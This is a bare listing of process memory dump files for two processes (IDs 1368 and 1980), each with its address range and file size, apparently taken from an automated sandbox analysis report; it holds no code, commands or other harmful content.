memory/1368-23-0x0000000002A30000-0x0000000002A66000-memory.dmpFilesize
216KB
-
memory/1368-27-0x0000000005D10000-0x0000000005D76000-memory.dmpFilesize
408KB
-
memory/1368-26-0x0000000005520000-0x0000000005586000-memory.dmpFilesize
408KB
-
memory/1368-44-0x0000000008870000-0x0000000008E14000-memory.dmpFilesize
5.6MB
-
memory/1368-43-0x0000000007640000-0x0000000007662000-memory.dmpFilesize
136KB
-
memory/1368-42-0x00000000076B0000-0x0000000007746000-memory.dmpFilesize
600KB
-
memory/1368-39-0x0000000006430000-0x000000000647C000-memory.dmpFilesize
304KB
-
memory/1368-37-0x0000000005DC0000-0x0000000006114000-memory.dmpFilesize
3.3MB
-
memory/1368-25-0x0000000005380000-0x00000000053A2000-memory.dmpFilesize
136KB
-
memory/1368-46-0x0000000008E20000-0x000000000D0FB000-memory.dmpFilesize
66.9MB
-
memory/1368-40-0x0000000007C40000-0x00000000082BA000-memory.dmpFilesize
6.5MB
-
memory/1368-24-0x00000000055B0000-0x0000000005BD8000-memory.dmpFilesize
6.2MB
-
memory/1368-38-0x0000000006350000-0x000000000636E000-memory.dmpFilesize
120KB
-
memory/1980-16-0x00007FFDB9F90000-0x00007FFDBAA51000-memory.dmpFilesize
10.8MB
-
memory/1980-15-0x00007FFDB9F90000-0x00007FFDBAA51000-memory.dmpFilesize
10.8MB
-
memory/1980-4-0x00007FFDB9F93000-0x00007FFDB9F95000-memory.dmpFilesize
8KB
-
memory/1980-22-0x00007FFDB9F90000-0x00007FFDBAA51000-memory.dmpFilesize
10.8MB
-
memory/1980-21-0x00007FFDB9F90000-0x00007FFDBAA51000-memory.dmpFilesize
10.8MB
-
memory/1980-20-0x00007FFDB9F93000-0x00007FFDB9F95000-memory.dmpFilesize
8KB
-
memory/1980-10-0x000001DA53F50000-0x000001DA53F72000-memory.dmpFilesize
136KB
-
memory/1980-17-0x00007FFDB9F90000-0x00007FFDBAA51000-memory.dmpFilesize
10.8MB